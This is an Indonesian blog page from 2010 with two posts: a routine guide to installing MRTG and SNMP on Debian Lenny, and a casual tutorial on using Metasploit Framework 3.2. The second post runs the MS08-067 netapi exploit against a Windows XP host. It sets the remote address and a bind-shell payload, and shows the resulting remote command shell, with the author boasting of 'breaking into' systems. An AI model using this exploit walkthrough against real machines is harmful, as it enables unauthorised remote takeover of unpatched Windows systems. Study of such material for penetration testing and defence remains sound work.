Monday 7 June 2010

Install And Configurasi Mrtg di Debian 5 Lenny

Install paket mrtg dan paket pendukungnya

apt-get install mrtg snmp

Edit konfigurasi snmp community name

nano /etc/snmp/snmpd.conf

Cari bagian:

#sec.name source community
com2sec paranoid default public
#com2sec readonly default public
#com2sec readwrite default private

Ganti sehingga menjadi seperti dibawah ini:

#sec.name source community
#com2sec paranoid default public
com2sec readonly default public

com2sec readonly 192.168.3.254/24 public23

com2sec readonly 192.168.1.2/24 public23

#com2sec readwrite default private

Restart service snmp

/etc/init.d/snmpd restart

Generate file konfigurasi yang akan menampilkan traffic graph

cfgmaker public@localhost > /etc/mrtg.cfg

Lakukan sedikit perubahan pada file mrtg.cfg untuk efek layout graph. Hilangkan tanda pagar (#) atau un-comment pada baris “Options[_]: growright, bits“.

nano /etc/mrtg.cfg
Options[_]: growright, bits

generate file html yang akan menampilkan hasil capture traffic.

indexmaker /etc/mrtg.cfg > /var/www/mrtg/index.html

Buka web browser dan masukkan nomor IP router/mrtg

http://localhost/mrtg

Thursday 3 June 2010

Metasploit Fromwork 3.2

setelah sekian lama mencari dan mencoba tutorial fromwork akhirnya berhasil juga ngejebol sistem mindos...

oke dech langsung aja gak usah banyak basa basi entar yang ada malah basih tuch makanan hehehhe

pertama-tamax download dulu formwork nya terserah mau yang fersi mindos or linux... di sini gw download yang fersi fermwork 3.2 yang untuk linux.... ini link nya http://www.metasploit.com/framework/download/framework-3.2.tar.gz .....

nah kalo udah di dowload yang fersi untuk linux tersebut.... langsung extrak aja dechhh
nich cara extrak nya bt ~ # tar xfv framework-3.2.tar.gz.... setelah di extrak

langsung masuk dech ke folder framework nya... setelah itu ketik
bt framework-3.2 # ./msfconsole

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.2-release
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf >

....
setelah itu ikutin langkah-langkanya berikut ini,..... untuk ngeliat versinya tinggal ketik aja

msf > version
Framework: 3.2-release.5962
Console : 3.2-release.5773
msf >

setelah itu langsung ke menu untuk penetrasi sistem ketik

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >


setelah tampil seperti yang di atas....kemudian kita... kemudian ketik untuk mengarahkan host mana yang akan kita serang contonya

msf exploit(ms08_067_netapi) > show option
msf exploit(ms08_067_netapi) > set rhost 192.168.0.62
rhost => 192.168.0.6
msf exploit(ms08_067_netapi) >

setelah langkah penetrasi host di dapat dan tidak ada kesalahan kita bisa lanjut dengan payload sistem yang akan kita netrasi tersebut contoh

msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) >

setelah payload tidak ada kendala langsung aja cikidot ke tkp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.0.30:54398 -> 192.168.0.62:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

nah gan sekarang tinggal acak-acak aja tuch sistem nya kalo mau ... tapi di sini gw nganjurin jangan suka ngacak-ngacak sistem oran gak baek untuk reputasi heker kita.... betul gak gak... oke sekian dulu tutorial metasploit semoga bermanfaat aminnnnnnm........................

dari kesimpulan tersebut tidak semua sistem aman, pasti semua itu mempunyai kelemahannya masing-masing.... jadi pesen gw jadilah orang yang bermanfaat minimal bagi diri sendiri....